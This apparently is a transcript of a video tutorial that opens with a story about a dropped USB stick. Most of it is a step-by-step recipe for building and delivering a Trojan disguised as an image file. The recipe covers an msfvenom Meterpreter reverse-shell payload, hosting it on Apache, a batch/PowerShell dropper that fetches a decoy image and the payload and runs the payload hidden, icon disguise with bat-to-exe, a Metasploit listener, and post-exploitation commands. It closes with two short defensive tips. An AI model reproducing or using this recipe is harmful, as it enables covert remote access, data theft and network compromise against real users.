It's a normal Tuesday morning for a guy named Alex. He's walking through his office parking lot when something catches his eye, a flash of silver on the asphalt. A USB flash drive. Alex picks it up. He knows he shouldn't, but curiosity is a powerful thing. He takes it up to his desk, plugs it into his office computer, and opens the directory. Inside, Alex finds an image file named Pussy Image. The small image icon shows a tiny blurry image of a woman. Now completely intrigued, Alex double-clicks the image. A second of lag, then a bizarre image pops up. It's a picture of a dead cat with bold text over it. Curiosity killed the pussycat. Alex laughs it off. He thinks, all right, someone's just playing a stupid prank on whoever found this. He closes the image, minimizes the window, and goes right back to his daily office routine, completely forgetting about it. But what Alex doesn't know is what just happened on the attacker's terminal. In less than 3 seconds, a hidden script executed a reverse shell. The hacker now has complete unrestricted access to Alex's computer. They can steal his files, watch his webcam, and pivot into the entire company's network. And it all started because Alex double-clicked a simple image. Or did he? And if you're worried about the pussycat in our scenario, don't be, because if curiosity killed the pussycat, satisfaction brings it back. So let's satisfy that curiosity and look under the hood of how this attack works in an isolated lab environment so you can protect yourself. Before we get our hands dirty, let's understand what just happened. Alex didn't open an image file, he opened a Trojan. Named after the ancient Greek Trojan Horse, a Trojan is malware disguised as legitimate software. It could look like a PDF, a Word document, a song, or, in Alex's case, an image file. When Alex double-clicked that file, 2 things happened simultaneously. First, the decoy image opened the dead cat photo, so Alex thought everything was normal. And second, hidden code ran silently in the background, establishing a connection to the attacker's machine. This is why Trojans are terrifying. They exploit the one vulnerability no antivirus can fully patch: human curiosity. Now that you know the theory, let's look at how these files are actually built. But before we do, let's establish some boundaries. Everything I'm about to show you is for educational purposes only. Never use these techniques on systems you don't own or have explicit permission to test. Unauthorized access to computer systems is illegal and can result in serious consequences. We are demonstrating these techniques in a controlled lab environment to help you understand and protect yourself against such attacks. To pull this off, we need a backdoor. On our Kali Linux machine, we use MSF Venom to create our payload. MSF Venom-P Windows/Meterpreter/reverse HTTPS lhost equals your attacker IP, lport equals 8080-F exe-o rev_shell.exe. This command creates a reverse shell. The lhost and lport tell the victim's machine where to call home once the file is opened. Now that we have generated our backdoor payload, we need a way to deliver it. To do that, we are going to host it on a local web server so the target's machine can fetch it later. Let's navigate to the default web root directory of Apache on Linux. cd/var/www/html/. This is the folder where any file we place becomes accessible over the local network. Next, let's create a dedicated folder inside this directory to keep things organized. We'll use sudo for administrative privileges and name it malicious file. Sudo mkdir malicious file. Now, we need to move the payload we generated earlier from our home directory straight into this new web folder. Sudo mv/rev_8080.exe/var/www/html/malicious file. With our file in place, the final step is to actually kickstart the web server. We do this by launching the Apache service. Sudo service apache2 start. To verify everything is running perfectly, let's open up a web browser and type in the local IP address of our attacker machine, followed by our folder name, http://yourattackerip/malicious file. As you can see, the index page loads up and our executable is completely visible. This means any script running on the target machine now has a direct URL to pull this payload down. Now for the clever part. We need a script that pulls off a classic bait and switch. It needs to download a decoy image the victim expects to see, fetch our actual malicious payload, open the image to keep up appearances, and execute the payload silently in the background. To do that, we're using this PowerShell one-liner wrapped inside a batch file. Let's break it down step by step. Step 1, we need our decoy. For this, we'll grab a clean car image straight from the internet. We copy its direct URL and paste it right here as our first file variable. Because it's a real image pulling directly from the web, it looks completely normal. Step 2, we need our payload. For the second URL, we point it directly to our malicious executable, which is currently being hosted on our Kali Linux web server. Once both URLs are set, the PowerShell command takes over. It loops through the variables, downloads both files straight into the victim's %temp directory, and uses invoke item to fire them up simultaneously. The beauty of this technique? The victim only ever sees the car image pop up on their screen. They think they just opened a picture, but behind the scenes, our malicious exe is already running silently in the background. To wrap this up, save the file as carimage.bat and make sure your Save As type dropdown is set to all files. Right now, our payload doesn't look like an image file at all, which would immediately raise suspicion. To make our malicious file appear as a legitimate image, we'll use a utility called bat-to-exe converter. While this is legitimate software, it can be misused for our purpose. Let me show you exactly how to transform our file. First, we need an appropriate icon. Windows displays icons for files, so we'll convert our decoy car image from PNG to ICO format. We'll use an online converter for this. Open your browser and navigate to convertio.co/png-ico. Click Choose Files and select our decoy car image. Click Convert. This will only take a few seconds. Download the resulting ICO file to your system. Now, let's use the bat-to-exe converter. First, load our car.image.bat file. For the icons section, browse and select the ICO file we just created. For exe format, select 32-bit Windows Invisible. This ensures no window pops up when executed. For the UAC option, I'll leave this unchecked for this demonstration. Attackers might enable this to request elevated privileges, but that would trigger a user account control prompt, making our file look suspicious. Note, if we wanted administrative access, we could check the UAC option, but since we want this to look like a simple image file without triggering any warnings, we'll leave it unchecked. Click Convert, save the file to your desktop, and name it car.image. Now our payload is packaged into a file that looks exactly like an image. We now have a file that appears to be an image thanks to the icon we assigned, making it much more likely that a victim would click on it without suspicion. This technique demonstrates how social engineering combined with technical tricks can create convincing malware that bypasses initial user suspicion. Before we execute our malicious file, we need to set up our listener on the attacker machine to catch the incoming connection. Let me walk you through this step by step. First, open your terminal and launch the Metasploit Framework console, MSF console. This will initialize the Metasploit framework and give us access to all its powerful tools. Now we need to select the appropriate handler module. We'll use the multi/handler module, which can handle various payload types. Use exploit/multi/handler. Next, we need to specify which payload we're expecting. Since our Trojan was configured with the reverse HTTPS payload, we'll set that. Set payload Windows/meterpreter/reverse HTTPS. Now we need to tell Metasploit where to listen for incoming connections. Replace the IP address with your attacker machine's IP. Set lhost equals 192.168.159.128. We also need to specify which port to listen on. We'll use port 8080. Set lport equals 8080. Finally, let's start the listener. Exploit. The handler is now waiting for a connection. Notice it says started HTTPS reverse handler. This confirms our listener is active and ready to catch connections from our Trojan. Now let's switch to our target machine where we've placed our disguised Trojan file. Here's our Trojan file. Notice how it has a picture icon and the name suggests it's an image. To a regular user, this appears completely innocent. Let's double-click the file. The image opens. It's just a car photo. Nothing suspicious, right? The victim sees exactly what they expected to see. But look at our attacker terminal. We now have a MeterPredator session opened. The victim has no idea this happened in the background. Now that we have access, let's gather some basic information about the target system. sysinfo. This command gives us details about the operating system, architecture, and computer name. Let's check what user privileges we have. getUID. This shows us which user account our MeterPredator session is running as. Now let's take a screenshot of the victim's desktop. Screenshot. I can now see system information, determine what user they're running as, and even capture screenshots of their desktop in real time. And this is just the beginning. With MeterPredator, I could install keyloggers, steal files, pivot to other machines on the network, maintain persistence, and much more. This demonstration shows how a simple social engineering trick combined with technical knowledge can lead to a complete system compromise without the victim ever realizing what happened. Terrifying, right? But knowledge is your best defense. Here are 2 simple rules to keep you safe. 1. Unhide file extensions. By default, Windows hides file extensions. That means a file named funnyimage.jpg might actually be funnyimage.jpg.exe. The fix: open File Explorer, click View, hover over Show, and check File Name Extensions. Make this your default setup. 2. Inspect before you inspect. If a file looks even slightly off, don't double-click it. The fix: right-click the file and hit Properties. Look closely at the type of file. If it's supposed to be a photo, it should say PNG or JPG, not application. So, what happened to Alex from our story? Well, if curiosity killed the cat, awareness brought it back. By understanding exactly how these masked files work, Alex, and now you, know exactly what to look for. Cybersecurity isn't just about expensive software or fancy tools, it's about understanding the human element. Hackers know that the easiest way into a system isn't through a complex firewall exploit, it's through simple human curiosity. If this breakdown helped you see through the trap, hit that subscribe button and turn on notifications. The more you know, the harder you are to hack. Let's talk in the comments. Have you ever stumbled across a suspicious file? How did you handle it? Stay curious, stay safe, and I'll see you in the next video.